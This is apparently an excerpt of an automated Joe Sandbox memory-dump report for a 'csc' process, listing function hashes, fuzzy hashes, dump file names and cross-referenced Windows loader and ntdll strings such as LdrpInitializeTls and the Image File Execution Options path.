                                                                                                                                                                        • Opcode ID: 67edc51500300d80ae1346971f2730bbf0c1130f251916ab1b02b64fa608eebb
                                                                                                                                                                        • Instruction ID: 82cc0b035137c0d100fd415a86b2c151353845e7f297ef4ba7c2a3794cfbcac7
                                                                                                                                                                        • Opcode Fuzzy Hash: 67edc51500300d80ae1346971f2730bbf0c1130f251916ab1b02b64fa608eebb
                                                                                                                                                                        • Instruction Fuzzy Hash: 53411332A446588BEF35DB95C848BADB7B9FF85350F1404A9DC02EBB80DB358981CB21
                                                                                                                                                                        Strings
                                                                                                                                                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0564B632
                                                                                                                                                                        • @, xrefs: 0564B670
                                                                                                                                                                        • GlobalFlag, xrefs: 0564B68F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                        • API String ID: 0-4192008846
                                                                                                                                                                        • Opcode ID: 097196289bb39446bc812aa8ef0eadb29a4a3e182e6406c45df6eb20872999f3
                                                                                                                                                                        • Instruction ID: c014b436e938032b3e527ae9332b53a26b8af2449d9d1e6008f4fd6c8b71e078
                                                                                                                                                                        • Opcode Fuzzy Hash: 097196289bb39446bc812aa8ef0eadb29a4a3e182e6406c45df6eb20872999f3
                                                                                                                                                                        • Instruction Fuzzy Hash: A73118B1A00219AEDF11EFA4CC95AEFBBB9FF44744F140469E605A7250E774DA40CBA4
                                                                                                                                                                        Strings
                                                                                                                                                                        • LdrpInitializeTls, xrefs: 05631A47
                                                                                                                                                                        • DLL "%wZ" has TLS information at %p, xrefs: 05631A40
                                                                                                                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 05631A51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                        • API String ID: 0-931879808
                                                                                                                                                                        • Opcode ID: e957d916099267addac136ab6b0358b8791844b1a966fb9befb8c974f7a6cd2a
                                                                                                                                                                        • Instruction ID: a7c6bd6f59f48fc2d5de3c44e6eda6a6a887f2ba3476fa99c592727806d6fb9f
                                                                                                                                                                        • Opcode Fuzzy Hash: e957d916099267addac136ab6b0358b8791844b1a966fb9befb8c974f7a6cd2a
                                                                                                                                                                        • Instruction Fuzzy Hash: A531E732B10605EBE7119B58CC46FAA76BAFB94758F05052DF606AB580EBB0AD80C794
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                                                                        • Opcode ID: cf6b4b18dd0c49248e36d2e552406bae06b4362eb28bad478314c9a1f6879f1b
                                                                                                                                                                        • Instruction ID: 5f9dcedba0df40b24929627012392b97bf68605b0ecf7864211e8b4bec84cfee
                                                                                                                                                                        • Opcode Fuzzy Hash: cf6b4b18dd0c49248e36d2e552406bae06b4362eb28bad478314c9a1f6879f1b
                                                                                                                                                                        • Instruction Fuzzy Hash: 24615C72E046189FDB24DFA8C845BAEBBB9FF48700F14406DE549EB291D732AD01CB64
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $$$
                                                                                                                                                                        • API String ID: 0-233714265
                                                                                                                                                                        • Opcode ID: 4d4762e112b7a330306453aa0a57a0ef33630b876393d955f351fc9f4662fad7
                                                                                                                                                                        • Instruction ID: 073347340c1295a80b4e76f8c29b2a40a45d5a37d7769c34594c411fbf48093d
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d4762e112b7a330306453aa0a57a0ef33630b876393d955f351fc9f4662fad7
                                                                                                                                                                        • Instruction Fuzzy Hash: F9619B72A0474ADFDB30DFA8C584BA9FBB2FF84704F144469D506AB640DB74A981CBA1
                                                                                                                                                                        Strings
                                                                                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 055C063D
                                                                                                                                                                        • kLsE, xrefs: 055C0540
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                        • API String ID: 0-2547482624
                                                                                                                                                                        • Opcode ID: 3027ab70d6d141eb1992757de028fc10294fbf33711b4d0a52424fe6883c73c7
                                                                                                                                                                        • Instruction ID: 4a9a769cff1bd415cf527c972ec4713905da869d8c9cac7415444d6a48ed49f5
                                                                                                                                                                        • Opcode Fuzzy Hash: 3027ab70d6d141eb1992757de028fc10294fbf33711b4d0a52424fe6883c73c7
                                                                                                                                                                        • Instruction Fuzzy Hash: 2151BD75604742CFC724EFB5C548AABBBE5BF84300F00487EE99A872A0E7749585CF92
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                        • API String ID: 0-118005554
                                                                                                                                                                        • Opcode ID: 83f64ab72b700abeb4806a9e6fc2e7534b245ac43776d7dc6af9756cae71ea0d
                                                                                                                                                                        • Instruction ID: c43d260a515ae793c8449d166ccb27bf7f3656ef874d6703f3e7633568b0a4bb
                                                                                                                                                                        • Opcode Fuzzy Hash: 83f64ab72b700abeb4806a9e6fc2e7534b245ac43776d7dc6af9756cae71ea0d
                                                                                                                                                                        • Instruction Fuzzy Hash: 683189323487419BD321DF28D858B2AB7E4BF84BA4F05086DBC558B390EA24D949CB52
                                                                                                                                                                        Strings
                                                                                                                                                                        • RtlpInitializeAssemblyStorageMap, xrefs: 05632A90
                                                                                                                                                                        • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 05632A95
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                        • API String ID: 0-2653619699
                                                                                                                                                                        • Opcode ID: 6e3a11c8b69f8e8bb5ef7700c4dbcfa65c6017a69694383675236f7bb431372f
                                                                                                                                                                        • Instruction ID: 4f04958cdeb8880771f8ecd4dec413f32ba808d73ee670c09f9fd2344c9cb0df
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e3a11c8b69f8e8bb5ef7700c4dbcfa65c6017a69694383675236f7bb431372f
                                                                                                                                                                        • Instruction Fuzzy Hash: 62110672B04205EBE7358A588D4AF6F76A9FB84B54F1584297A05EB344EA74CD00C7E0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                                                                                        • Opcode ID: 22d3ca5674013f605fb0cebb6a7410e9f9de40b3af7cc00e0493775b1864c770
                                                                                                                                                                        • Instruction ID: 6204f243dbcaf108a2597a6e9784e59604cab98dcdbcf12a0e4a9bdbc158d2f5
                                                                                                                                                                        • Opcode Fuzzy Hash: 22d3ca5674013f605fb0cebb6a7410e9f9de40b3af7cc00e0493775b1864c770
                                                                                                                                                                        • Instruction Fuzzy Hash: 0401D1B2654704AFE312DF24CD4AB1677E8FB44715F008939B64CC7190E774D844CB46
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: MUI
                                                                                                                                                                        • API String ID: 0-1339004836
                                                                                                                                                                        • Opcode ID: 6f12a72a0cb4232935467a67efb9adae1a596bf20c9f34a47a3a761a8005f18f
                                                                                                                                                                        • Instruction ID: 6e0cfbcf3246fdb2626a9de73e092439c4572c70b7e6d8d6496f898a6607b875
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f12a72a0cb4232935467a67efb9adae1a596bf20c9f34a47a3a761a8005f18f
                                                                                                                                                                        • Instruction Fuzzy Hash: 00824975E042589FDB24CFE9C884BADBBB6BF48710F1481ADD86AEB250D770AD41CB50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ee5f25f47465281040a6a98a18e3a9d0ba935227a606dd5c190cef5fccc5fd73
                                                                                                                                                                        • Instruction ID: ace64eccbdbe3e860badacaf044ce538c1864fc550c4e492920fa67413ff0e60
                                                                                                                                                                        • Opcode Fuzzy Hash: ee5f25f47465281040a6a98a18e3a9d0ba935227a606dd5c190cef5fccc5fd73
                                                                                                                                                                        • Instruction Fuzzy Hash: 79416C75E00288EFDB24CFA9D480AAEBBF4FF48300F50452EE959A7211DB30A940CF64
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                                                        • Opcode ID: 3928c036e2dd5d17c93f95b3555bff99c93ff1c4b09b178f65bc378f27492750
                                                                                                                                                                        • Instruction ID: 1573feef392fc450022c38ff282e3cff0764f595b869901ef5304e3bb3aafaf2
                                                                                                                                                                        • Opcode Fuzzy Hash: 3928c036e2dd5d17c93f95b3555bff99c93ff1c4b09b178f65bc378f27492750
                                                                                                                                                                        • Instruction Fuzzy Hash: D7916072A40219AFDB25DF94CD85FAEB7B9FF49750F110065F601AB290D774AD00CBA1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: GlobalTags
                                                                                                                                                                        • API String ID: 0-1106856819
                                                                                                                                                                        • Opcode ID: 1e5a3a2de276eb182334a69fcd6f5a6fdc75980c76ef195a07969eaba283ca6e
                                                                                                                                                                        • Instruction ID: 3990cb0cf85cc627f3a20fd66ef1935372bb731606a9f672a15ae9009d0f1d46
                                                                                                                                                                        • Opcode Fuzzy Hash: 1e5a3a2de276eb182334a69fcd6f5a6fdc75980c76ef195a07969eaba283ca6e
                                                                                                                                                                        • Instruction Fuzzy Hash: BA717F75E0421AEFDF68CF98D591AEDBBB2BF48704F14812EE806A7740E7709941CB64
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @
                                                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                                                        • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                                                                        • Instruction ID: fe13277d36bf272f9b60a03bbee194b2051b57c49d535c68c07947f208a39e58
                                                                                                                                                                        • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B618976D04619AFDF21DFA9C844BEEBBB5FF80710F1445ADE811A7290D774AA01CBA0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @
                                                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                                                        • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                                                                        • Instruction ID: 25646ac61b469626e56723f5b9f8dda122658f9051ec23f62747ea8aea54f7ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                                                                        • Instruction Fuzzy Hash: 0E518972618705AFE721EF54C844F6BF7E8FB84750F000929B9809B690E7B4ED04CBA6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: EXT-
                                                                                                                                                                        • API String ID: 0-1948896318
                                                                                                                                                                        • Opcode ID: ddeee2f67b0479b27ee0ed138ff341fdc721c14b8891f78f9af028066d393d94
                                                                                                                                                                        • Instruction ID: 7a278a40e8cb779a712a78039a8d21b1daa34f3085a505e1211f4bed96f6b1a1
                                                                                                                                                                        • Opcode Fuzzy Hash: ddeee2f67b0479b27ee0ed138ff341fdc721c14b8891f78f9af028066d393d94
                                                                                                                                                                        • Instruction Fuzzy Hash: F9418F73608352ABD761DA68C885B6BF7ECBF88B04F44092DF585DB180EA74D904C7A7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: BinaryHash
                                                                                                                                                                        • API String ID: 0-2202222882
                                                                                                                                                                        • Opcode ID: ae0afe0c55be371772b542eaf810529d2e55b1eef3adb121f0034eb9e8193ee5
                                                                                                                                                                        • Instruction ID: 3563f48e435f23bb11524ddd2e89cc7224193a9fea9e1654b15be38aa8ec8794
                                                                                                                                                                        • Opcode Fuzzy Hash: ae0afe0c55be371772b542eaf810529d2e55b1eef3adb121f0034eb9e8193ee5
                                                                                                                                                                        • Instruction Fuzzy Hash: A94114B1D0052DAAEB21DA50CC85FDEB77DAF45714F0045A9FA09B7140DB709E89CFA8
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: verifier.dll
                                                                                                                                                                        • API String ID: 0-3265496382
                                                                                                                                                                        • Opcode ID: 8f933cba0c0da75b02788a8400f6f7568912c25cca1b1e116dccabb97610f180
                                                                                                                                                                        • Instruction ID: 23e92c7496f0dcab8a6b381794d7db11362c38a2f5d7835efee81d44c40a3060
                                                                                                                                                                        • Opcode Fuzzy Hash: 8f933cba0c0da75b02788a8400f6f7568912c25cca1b1e116dccabb97610f180
                                                                                                                                                                        • Instruction Fuzzy Hash: A2319F717502069FDB749E2C9861A77B6E6FB98310F54887AE6069B780EA718C80CB90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: #
                                                                                                                                                                        • API String ID: 0-1885708031
                                                                                                                                                                        • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                                                                        • Instruction ID: b04f558e11694e0d4f0a81373a738e5830209ca7788f6c4568bbd8afd247f745
                                                                                                                                                                        • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                                                                        • Instruction Fuzzy Hash: 6441A375A14616EBCF25DF48C494BBEB7B6FF89701F00446AEA4697240DB30D981CBE1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Flst
                                                                                                                                                                        • API String ID: 0-2374792617
                                                                                                                                                                        • Opcode ID: 5280a172a94e30733906605e43d9326bf681b62937baec303916cd6b716f5d0b
                                                                                                                                                                        • Instruction ID: 5b974d4f3901d74941d81bbc4781bb855b975a3e95b7d159f6c498fa7b6e544f
                                                                                                                                                                        • Opcode Fuzzy Hash: 5280a172a94e30733906605e43d9326bf681b62937baec303916cd6b716f5d0b
                                                                                                                                                                        • Instruction Fuzzy Hash: E441BCB120A301DFD714CF18C084A26FBE5FB89714F15896EE54ACF241EB31DA86CBA1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: L4CwL4Cw
                                                                                                                                                                        • API String ID: 0-1654103815
                                                                                                                                                                        • Opcode ID: 44ff88fff6cae04bcbfda7b5bbb483234d91ca951106f4e7c4a8d4b175bcfb6c
                                                                                                                                                                        • Instruction ID: 2e57af39cc7361766d05503056499e8e9d7d89a2bbe72c5e4ce748a23d7f356f
